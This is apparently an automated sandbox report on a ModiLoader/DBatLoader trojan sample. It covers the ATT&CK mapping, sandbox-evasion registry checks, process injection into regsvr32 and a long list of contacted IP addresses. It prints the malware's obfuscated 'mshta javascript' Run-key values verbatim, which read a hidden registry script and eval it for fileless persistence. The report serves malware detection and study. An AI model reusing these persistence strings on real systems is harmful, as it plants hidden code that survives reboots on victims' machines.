Malware Analysis Report

2024-08-06 14:07

Sample ID 240616-r5t2lsxcpf
Target b40e7591d3334624579042161dbaeacb_JaffaCakes118
SHA256 63c8979bce14d879fbfa7263d37ea4433d7268dde1add2beda5040a52bb0792f
Tags
modiloader evasion persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

63c8979bce14d879fbfa7263d37ea4433d7268dde1add2beda5040a52bb0792f

Threat Level: Known bad

The file b40e7591d3334624579042161dbaeacb_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

modiloader evasion persistence trojan

ModiLoader, DBatLoader

Checks for common network interception software

ModiLoader Second Stage

Looks for VirtualBox Guest Additions in registry

Adds policy Run key to start application

Looks for VMWare Tools registry key

Deletes itself

Checks BIOS information in registry

Maps connected drives based on registry

Adds Run key to start application

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Privilege Escalation
TA0004
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Defense Evasion
TA0005
Virtualization/Sandbox Evasion
T1497
Modify Registry
T1112
Credential Access
TA0006
Discovery
TA0007
Software Discovery
T1518
Query Registry
T1012
Virtualization/Sandbox Evasion
T1497
System Information Discovery
T1082
Peripheral Device Discovery
T1120
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-16 14:47

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-16 14:47

Reported

2024-06-16 14:49

Platform

win7-20240611-en

Max time kernel

150s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\regsvr32.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ = "mshta javascript:HB1LH8YrRL=\"lIjAFv\";LK0=new%20ActiveXObject(\"WScript.Shell\");xFv6NqDD=\"ibfAtg\";XeS64d=LK0.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\1252912de7\\\\3b9ecf21\");cdFcV7M=\"uKIn48IVI\";eval(XeS64d);fXSPprd35b=\"B2CCW0walh\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\regsvr32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:Qli2Lka=\"Q\";uv8=new%20ActiveXObject(\"WScript.Shell\");JyxI7FK=\"IpVkU\";Du2g1D=uv8.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\1252912de7\\\\3b9ecf21\");rM2TZqnA=\"hfHH\";eval(Du2g1D);cJCxMU4D=\"ZtgJ\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:Q9PyqeYR=\"yJo0\";e8n0=new%20ActiveXObject(\"WScript.Shell\");btOmBq4f=\"29\";dUF1O=e8n0.RegRead(\"HKCU\\\\software\\\\1252912de7\\\\3b9ecf21\");JZ5hCrv3u=\"7BTar\";eval(dUF1O);OHrX6Dmg=\"xO1RFN\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Windows\SysWOW64\regsvr32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2540 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2540 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2540 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2540 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2540 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2540 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2540 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2120 wrote to memory of 2564 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2120 wrote to memory of 2564 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2120 wrote to memory of 2564 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2120 wrote to memory of 2564 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2120 wrote to memory of 2564 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2120 wrote to memory of 2564 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2120 wrote to memory of 2564 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2564 wrote to memory of 2452 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2564 wrote to memory of 2452 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2564 wrote to memory of 2452 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2564 wrote to memory of 2452 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2564 wrote to memory of 2452 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2564 wrote to memory of 2452 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2564 wrote to memory of 2452 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2564 wrote to memory of 264 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2564 wrote to memory of 264 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2564 wrote to memory of 264 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2564 wrote to memory of 264 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2564 wrote to memory of 264 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2564 wrote to memory of 264 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2564 wrote to memory of 264 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

Network

Country Destination Domain Proto
US 215.135.234.1:80 tcp
US 206.110.205.83:80 tcp
US 11.30.152.143:80 tcp
BH 15.185.188.227:80 tcp
ZA 160.115.3.10:80 tcp
US 33.31.224.164:80 tcp
ID 39.230.35.148:80 tcp
US 19.133.155.252:80 tcp
MU 102.205.133.189:443 tcp
US 52.134.171.120:80 tcp
KR 223.195.57.218:80 tcp
US 99.34.172.172:80 tcp
US 11.90.129.127:80 tcp
PL 94.40.101.52:80 tcp
FR 83.152.211.81:80 tcp
US 207.4.203.180:80 tcp
US 131.22.118.190:80 tcp
TR 85.106.203.95:80 tcp
US 130.21.202.48:80 tcp
US 13.189.11.241:80 tcp
AU 18.155.235.24:80 tcp
US 166.250.106.181:80 tcp
AU 18.155.235.24:80 18.155.235.24 tcp
DK 80.160.149.166:8080 tcp
US 70.126.192.59:80 tcp
EG 102.41.140.174:80 tcp
IN 27.4.205.153:80 tcp
IE 57.214.62.10:80 tcp
US 52.114.134.163:80 tcp
CN 115.46.159.97:80 tcp
US 168.141.72.202:80 tcp
IT 193.206.146.150:80 tcp
SA 185.5.153.24:80 tcp
FR 83.154.166.29:80 tcp
CN 171.218.161.77:80 tcp
IN 27.58.68.16:80 tcp
EG 154.188.5.52:80 tcp
CN 171.39.13.24:80 tcp
EC 186.42.176.226:80 tcp
US 198.107.21.193:80 tcp
TN 102.25.47.107:80 tcp
US 15.41.18.45:443 tcp
MX 201.166.130.170:80 tcp
CA 142.72.9.67:80 tcp
CH 57.39.17.6:80 tcp
US 38.33.44.123:80 tcp
US 70.252.137.245:80 tcp
IT 79.29.156.229:80 tcp
AR 186.38.194.224:80 tcp
JP 130.87.15.43:80 tcp
CN 42.59.43.128:80 tcp
US 48.117.4.92:80 tcp
US 170.164.238.99:80 tcp
US 170.207.187.181:8080 tcp
US 100.29.232.161:8080 tcp
IT 81.81.188.229:80 tcp
US 198.124.26.5:80 tcp
AT 89.26.57.142:80 tcp
SG 43.31.18.61:80 tcp
US 66.166.81.66:80 tcp
US 66.229.217.191:80 tcp
JP 106.181.28.151:8080 tcp
US 107.180.192.234:80 tcp
FI 91.157.46.154:80 tcp
US 54.213.99.211:80 tcp
IR 80.191.187.113:80 tcp
DE 176.9.170.230:80 tcp
N/A 10.109.62.91:80 tcp
US 75.53.63.135:80 tcp
CA 129.128.123.76:80 tcp
IN 101.221.157.111:8080 tcp
US 198.111.190.118:80 tcp
UA 95.134.59.35:80 tcp
JP 122.130.47.140:80 tcp
SK 95.103.13.100:80 tcp
JP 210.234.211.191:80 tcp
US 169.55.224.143:80 tcp
US 34.214.140.56:80 tcp
US 97.189.243.85:80 tcp
CA 76.64.126.236:80 tcp
BR 177.19.50.230:80 tcp
JP 219.100.139.111:80 tcp
US 17.79.132.237:80 tcp
US 30.108.7.97:80 tcp
IN 223.227.221.114:80 tcp
US 66.175.55.196:80 tcp
US 64.236.104.217:80 tcp
BR 187.5.84.42:80 tcp
SE 138.6.114.87:80 tcp
US 54.92.223.160:80 tcp
JP 150.27.56.220:8080 tcp
US 17.238.131.131:80 tcp
US 172.254.156.3:80 tcp
US 12.49.108.102:80 tcp
US 171.133.105.194:80 tcp
GB 195.27.17.196:80 tcp
IR 5.114.106.119:80 tcp
US 71.53.81.214:80 tcp
US 139.37.76.164:80 tcp
CA 173.33.117.74:443 tcp
US 34.216.169.228:80 tcp
BR 179.238.180.22:8080 tcp
US 64.21.31.187:8080 tcp
KR 211.53.5.28:80 tcp
FR 37.69.149.73:80 tcp
ZA 168.211.62.1:80 tcp
ZA 41.132.219.210:80 tcp
US 137.209.150.174:80 tcp
JP 60.81.133.118:80 tcp
DE 195.30.194.141:80 tcp
US 150.216.37.34:80 tcp
US 75.145.202.7:80 tcp
US 99.83.106.18:80 tcp
US 44.150.72.114:443 tcp
CN 183.36.54.161:80 tcp
KR 58.124.149.27:80 tcp
KR 121.253.48.56:80 tcp
US 131.143.47.55:80 tcp
CN 183.202.98.159:80 tcp
US 172.148.75.181:80 tcp
IN 110.226.229.193:80 tcp
JP 163.58.16.147:80 tcp
IL 2.54.23.253:80 tcp
US 28.223.154.24:80 tcp
CN 59.111.192.15:80 tcp
NO 217.77.47.137:80 tcp
TW 60.198.59.200:443 tcp
US 32.30.181.190:80 tcp
DE 176.94.243.236:80 tcp
US 34.6.88.247:80 tcp
US 216.188.182.208:80 tcp
CN 117.129.180.129:443 tcp
US 72.239.125.189:80 tcp
PH 202.89.207.57:80 tcp
CN 120.216.209.205:80 tcp
US 7.177.189.63:80 tcp
US 144.170.241.36:80 tcp
SE 91.95.182.223:80 tcp
PT 139.83.101.38:80 tcp
CN 58.249.185.7:80 tcp
IT 147.122.249.92:80 tcp
NL 130.143.251.84:8080 tcp
US 35.17.176.1:80 tcp
US 3.158.180.184:8080 tcp
GB 92.15.226.36:80 tcp
PL 91.222.110.209:80 tcp
MA 196.217.147.240:80 tcp
FR 92.175.60.212:80 tcp
KR 119.210.69.17:80 tcp
DE 109.45.125.157:80 tcp
MX 187.152.190.214:80 tcp
EG 105.95.254.1:80 tcp
FI 195.156.122.163:80 tcp
JP 164.71.237.16:80 tcp
RU 37.78.91.73:8080 tcp
US 3.87.174.13:80 tcp
CN 120.225.74.43:80 tcp
US 71.217.116.44:80 tcp
CA 174.113.152.52:80 tcp
CN 110.205.187.34:80 tcp
US 107.14.235.111:80 tcp
JP 49.101.158.30:80 tcp
ES 85.59.52.135:80 tcp
CN 120.238.8.232:80 tcp
BR 189.201.236.234:8080 tcp
US 204.91.215.80:443 tcp
US 161.69.199.202:8080 tcp
JP 111.90.40.210:8080 tcp
EC 190.95.209.150:80 tcp
CN 27.18.250.25:80 tcp
RU 88.84.203.38:80 tcp
US 67.126.237.66:80 tcp
US 184.174.207.238:80 tcp
HK 43.162.224.6:8080 tcp
US 75.97.172.113:80 tcp
N/A 127.183.133.67:80 tcp

Files

memory/2540-0-0x00000000020D0000-0x00000000021D0000-memory.dmp

memory/2540-1-0x0000000000240000-0x0000000000241000-memory.dmp

memory/2540-2-0x0000000000400000-0x000000000047E000-memory.dmp

memory/2540-4-0x0000000000050000-0x000000000011C000-memory.dmp

memory/2540-6-0x0000000000050000-0x000000000011C000-memory.dmp

memory/2540-8-0x0000000000050000-0x000000000011C000-memory.dmp

memory/2540-5-0x0000000000050000-0x000000000011C000-memory.dmp

memory/2540-9-0x0000000000050000-0x000000000011C000-memory.dmp

memory/2120-14-0x00000000004F0000-0x00000000004F7000-memory.dmp

memory/2540-16-0x0000000000400000-0x000000000047E000-memory.dmp

memory/2120-18-0x00000000004F0000-0x00000000004F7000-memory.dmp

memory/2120-20-0x0000000000140000-0x000000000020C000-memory.dmp

memory/2120-23-0x0000000000140000-0x000000000020C000-memory.dmp

memory/2120-22-0x0000000000140000-0x000000000020C000-memory.dmp

memory/2120-21-0x0000000000140000-0x000000000020C000-memory.dmp

memory/2120-19-0x0000000000140000-0x000000000020C000-memory.dmp

memory/2120-24-0x0000000000140000-0x000000000020C000-memory.dmp

memory/2564-35-0x00000000001E0000-0x00000000002AC000-memory.dmp

memory/2564-38-0x00000000001E0000-0x00000000002AC000-memory.dmp

memory/2564-36-0x00000000001E0000-0x00000000002AC000-memory.dmp

memory/2564-37-0x00000000001E0000-0x00000000002AC000-memory.dmp

memory/2564-41-0x00000000001E0000-0x00000000002AC000-memory.dmp

memory/2564-43-0x00000000001E0000-0x00000000002AC000-memory.dmp

memory/2564-46-0x00000000001E0000-0x00000000002AC000-memory.dmp

memory/2564-42-0x00000000001E0000-0x00000000002AC000-memory.dmp

memory/2564-44-0x00000000001E0000-0x00000000002AC000-memory.dmp

memory/2564-40-0x00000000001E0000-0x00000000002AC000-memory.dmp

memory/2564-45-0x00000000001E0000-0x00000000002AC000-memory.dmp

memory/2564-47-0x00000000001E0000-0x00000000002AC000-memory.dmp

memory/2564-48-0x00000000001E0000-0x00000000002AC000-memory.dmp

memory/2564-39-0x00000000001E0000-0x00000000002AC000-memory.dmp

memory/2564-34-0x00000000001E0000-0x00000000002AC000-memory.dmp

memory/2452-49-0x00000000004F0000-0x00000000004F7000-memory.dmp

memory/2452-51-0x00000000004F0000-0x00000000004F7000-memory.dmp

memory/2452-56-0x0000000000190000-0x000000000025C000-memory.dmp

memory/2452-57-0x0000000000190000-0x000000000025C000-memory.dmp

memory/2452-55-0x0000000000190000-0x000000000025C000-memory.dmp

memory/2452-54-0x0000000000190000-0x000000000025C000-memory.dmp

memory/2452-53-0x0000000000190000-0x000000000025C000-memory.dmp

memory/2452-52-0x0000000000190000-0x000000000025C000-memory.dmp

memory/2564-58-0x00000000001E0000-0x00000000002AC000-memory.dmp

memory/2564-59-0x00000000001E0000-0x00000000002AC000-memory.dmp

memory/264-64-0x0000000000250000-0x000000000031C000-memory.dmp

memory/264-67-0x0000000000250000-0x000000000031C000-memory.dmp

memory/264-66-0x0000000000250000-0x000000000031C000-memory.dmp

memory/264-65-0x0000000000250000-0x000000000031C000-memory.dmp

memory/264-63-0x0000000000250000-0x000000000031C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-16 14:47

Reported

2024-06-16 14:49

Platform

win10v2004-20240508-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\regsvr32.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Windows\SysWOW64\regsvr32.exe N/A
